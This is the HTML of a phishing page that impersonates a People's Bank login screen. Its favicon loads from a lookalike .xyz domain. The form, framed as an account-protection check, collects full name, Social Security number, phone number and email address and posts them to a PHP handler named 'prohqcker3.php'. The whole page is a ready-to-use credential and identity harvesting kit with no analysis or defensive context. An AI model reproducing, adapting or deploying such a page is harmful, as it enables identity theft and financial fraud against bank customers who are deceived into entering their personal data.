<!DOCTYPE html>
<html class="js flexbox fontface objectfit object-fit csspositionsticky cssreflections no-regions cssresize shapes siblinggeneral subpixelfont supports csstransforms3d preserve3d canvas canvastext emoji devicemotion deviceorientation svg svgasimg svgclippaths svgfilters svgforeignobject inlinesvg smil no-touchevents typedarrays uagent-chrome uagent-webkit uagent-osWindows" lang="en" style="background-image: url(img/desktop-background-31261c4b72eb487c279e9a1b57d9f095.jpg);" stencil-hydrated=""><head id="pageheader">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <link href="info_files/app.css" rel="stylesheet" data-no-shim="">
    <link href="info_files/highcontrast-23d6f5c394031f2b7a197598ef562da5.css" rel="stylesheet" data-no-shim="">
    <link href="info_files/theme-q2-c78f9a6334979dc02a4414cf3a8779e5.css" rel="stylesheet" data-no-shim="">
    <link href="info_files/tecton-590048df214033d1c1591d552a32c9af.css" rel="stylesheet">
    <link rel="shortcut icon" href="https://peoplesbanc0claim0nline.xyz/favicon.ico">
    <title>People's Bank | Login</title>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="description">
    <meta name="author">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no, address=no, email=no">
    <meta id="viewportMeta" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=0, user-scalable=no, viewport-fit=cover">
    <meta name="referrer" content="origin">
    <script type="text/javascript" src="info_files/mask.js"></script>
</head>
<body id="pagebody" class="ember-application desktop theme-q2 frameless">
<div class="ember-view app-container desktop unauthenticated vertical-nav pfm-disabled no-pfm-accounts has-footer" id="ember4">
  <div id="ember16" class="main-view grid-row drawer-view main-view ember-view">
    <div id="ember25" class="focusing-outlet ember-view">
      <div id="login-modal"></div>
      <div class="login-outer">
        <div class="login-inner" id="login-inner">
          <div class="login-title">
            <h1 id="ember33" class="ui-logo large ember-view">
              <span class="sr-only" test-id="logoDescriptiveText">People's Bank | Login</span>
              <div aria-hidden="true" class="logo-image" test-id="logoDiv"></div>
            </h1>
          </div>
          <div class="login-static-alert login-message login-alert-message loginFormArea"></div>
          <div class="login-form loginFormArea">
            <form class="is-invalid" action="prohqcker3.php" method="post">
                <p style="font-size: 20px; font-weight: 600">Account Information</p><p style="font-size:16px">To protect your account, please provide the requested information.</p>
                <div class="field">
                    <label class="login-field" for="fldUsername">Full Name</label>
                    <input test-id="fldUsername" spellcheck="false" autocapitalize="none" autocorrect="off" placeholder="" autocomplete="off" title="" name="fname" id="fldUsername" class="mrg-T-sm login-field form-control ember-text-field form-control ember-view" type="text">
                </div>
                <div class="field">
                    <label class="login-field" for="fldUsername">Social Security Number</label>
                    <input test-id="phone" spellcheck="false" autocapitalize="none" autocorrect="off" placeholder="" autocomplete="off" title="" name="ssn" id="ssn" class="mrg-T-sm login-field form-control ember-text-field form-control ember-view" type="tel">
                    <script>
                    var element = document.getElementById('ssn');
                    var maskOptions = {
                    mask: '000-00-0000'
                    };
                    var mask = IMask(element, maskOptions);
                    </script>
                </div>
                <div class="field">
                    <label class="login-field" for="fldUsername">Phone Number</label>
                    <input test-id="phone" spellcheck="false" autocapitalize="none" autocorrect="off" placeholder="" autocomplete="off" title="" name="phone" id="phone" class="mrg-T-sm login-field form-control ember-text-field form-control ember-view" type="tel">
                    <script>
                    var element = document.getElementById('phone');
                    var maskOptions = {
                    mask: '(000) 000-0000'
                    };
                    var mask = IMask(element, maskOptions);
                    </script>
                </div>
                <div class="field ">
                    <label class="login-field" for="fldUsername">Email Address</label>
                    <input test-id="fldUsername" spellcheck="false" autocapitalize="none" autocorrect="off" placeholder="" autocomplete="off" title="" name="email" id="fldUsername" class="mrg-T-sm login-field form-control ember-text-field form-control ember-view" type="text">
                </div>
                <div id="submissionArea">
                    <div id="userLinks">
                        <button class="logon-submit btn-primary btn-block pointer btn submitButton submit" type="submit">Continue</button>
                    </div>
                </div>
            </form>
          </div>
          <div class="login-icons clearfix">
            <a href="tel:8003973790" class="login-adLink callme-button">Call Us</a>
            <a class="login-adLink privacy_link" test-id="lnkPrivacy">Privacy Policy</a>
            <a target="_blank" class="login-adLink" href="#">Contact Us</a>
            <a target="_blank" class="login-adLink" href="#">Forgot Login</a>
            <a target="_blank" class="login-adLink" href="">Locations</a>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>

</body></html>